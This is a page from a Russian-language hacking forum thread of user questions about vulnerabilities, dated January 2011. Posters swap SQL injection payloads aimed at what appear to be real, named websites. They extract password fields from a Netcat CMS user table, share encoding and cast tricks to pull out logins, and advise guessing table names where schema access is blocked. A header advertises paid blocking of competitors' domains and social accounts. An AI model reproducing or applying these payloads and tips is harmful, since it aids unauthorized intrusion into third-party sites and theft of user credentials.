УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 1622 из 2438

1622

Опции темы

Поиск в этой теме

Опции просмотра

#16211

25.01.2011, 03:49

ZnikiR

Участник форума

Регистрация: 14.01.2009

Сообщений: 194

Провел на форуме:
798217

Репутация: 44

Отправить сообщение для ZnikiR с помощью ICQ

Никак не могу понять как здесь код sql написть

Цитата:

Сообщение от None

http://zhlondon.by/index.php?option=com_phocagallery&view=categories& Itemid=
http://www.reporter.tj/index.php?option=com_idoblog&task=profile&Itemid=1 337&userid=65
http://www.acfpl.org/index.php?option=com_idoblog&task=profile&Itemid=1 337&userid=

#16212

25.01.2011, 08:21

xarko_v

Guest

Сообщений: n/a

Провел на форуме:
3318

Репутация: 0

http://www.exploit-db.com/exploits/15827/

#16213

25.01.2011, 13:31

Unknown

Guest

Сообщений: n/a

Провел на форуме:
191387

Репутация: 6

Netcat CMS

-1+union+select+1,user_id+from+User+--+ показывает

-1+union+select+1,unhex(hex(password))+from+User+--+ показывает

-1+union+select+1,password+from+User+--+ показывает

-1+union+select+1,login+from+User+--+ НЕ показывает

-1+union+select+1,unhex(hex(login))+from+User+--+ НЕ показывает

-1+union+select+1,aes_decrypt(aes_encrypt(login))+f rom+User+--+ НЕ показывает

Ни Email, Login, ForumName, FullName не хочет показывать как можно это обойти?

#16214

25.01.2011, 13:37

shell_c0de

Reservists Of Antichat - Level 6

Регистрация: 07.07.2009

Сообщений: 324

Провел на форуме:
1585404

Репутация: 564

Отправить сообщение для shell_c0de с помощью ICQ

Отправить сообщение для shell_c0de с помощью AIM

2noviyuser

пробуй захексить

login=0x6c6f67696e

__________________
Никогда не бойся делать то, что ты не умеешь. Помни, ковчег был построен любителем. "Титаник" - проффесионалами.

#16215

25.01.2011, 13:39

Unknown

Guest

Сообщений: n/a

Провел на форуме:
191387

Репутация: 6

Цитата:

Сообщение от shell_c0de

shell_c0de said:
2noviyuser
пробуй захексить
login=0x6c6f67696e

не хочет показывает только login, не подошел

можент надо конвертировать str в int? есть ли такая функция

#16216

26.01.2011, 04:01

ivitalii

Guest

Сообщений: n/a

Провел на форуме:
1884

Репутация: 0

Код:

Code:
On /index.php?name=1%00%27&file=faq&p=3098
While executing query "SELECT mid, title, custom_title, active, view, blocks, version FROM cms_modules WHERE LOWER(title)='1�''"

the following error occured: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1' at line 1

In: /home/anonimka/public_html/index.php on line: 73

Что за ошибка ? можно как-нибудь раскрутить ?

#16217

26.01.2011, 05:56

Redwood

Участник форума

Регистрация: 10.09.2009

Сообщений: 120

Провел на форуме:
2212846

Репутация: 56

Цитата:

Сообщение от ivitalii

ivitalii said:

Код:

Code:
On /index.php?name=1%00%27&file=faq&p=3098
While executing query "SELECT mid, title, custom_title, active, view, blocks, version FROM cms_modules WHERE LOWER(title)='1�''"

the following error occured: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1' at line 1

In: /home/anonimka/public_html/index.php on line: 73

Что за ошибка ? можно как-нибудь раскрутить ?

Ошибка синтаксиса MySQL. По всей видимости, можно.

Как раскрутить, написано здесь /thread43966.html

П.С. Зачем там нуллбайт?

#16218

26.01.2011, 07:28

xarko_v

Guest

Сообщений: n/a

Провел на форуме:
3318

Репутация: 0

Цитата:

Сообщение от noviyuser

noviyuser said:
Netcat CMS
-1+union+select+1,user_id+from+User+--+ показывает
-1+union+select+1,unhex(hex(password))+from+User+--+ показывает
-1+union+select+1,password+from+User+--+ показывает
-1+union+select+1,login+from+User+--+ НЕ показывает
-1+union+select+1,unhex(hex(login))+from+User+--+ НЕ показывает
-1+union+select+1,aes_decrypt(aes_encrypt(login))+f rom+User+--+ НЕ показывает
Ни Email, Login, ForumName, FullName не хочет показывать как можно это обойти?

+union+select+1,cast(version()+as+binary),3,4,5,6

or

+union+select+1,convert(version()+using+latin1),3, 4,5,6

or

/*!...*/

#16219

27.01.2011, 14:20

qaz

Guest

Сообщений: n/a

Провел на форуме:
344922

Репутация: 75

помогите разобратся, невогу вывести информацию из табле схема, постоянно пишет ошибку

http://nicedave.com/content.php?id=6659+union+select+1,2,3

#16220

27.01.2011, 14:29

TreV@N

Участник форума

Регистрация: 14.07.2008

Сообщений: 117

Провел на форуме:
792994

Репутация: 104

Цитата:

Сообщение от qaz

qaz said:
помогите разобратся, невогу вывести информацию из табле схема, постоянно пишет ошибку
http://nicedave.com/content.php?id=6659+union+select+1,2,3

Доступ к information_schema закрыт.Ручками перебирай таблицы.Там есть таблица "users"

Страница 1622 из 2438

1622

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Уязвимости CMS / форумов	26	15.02.2005 22:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход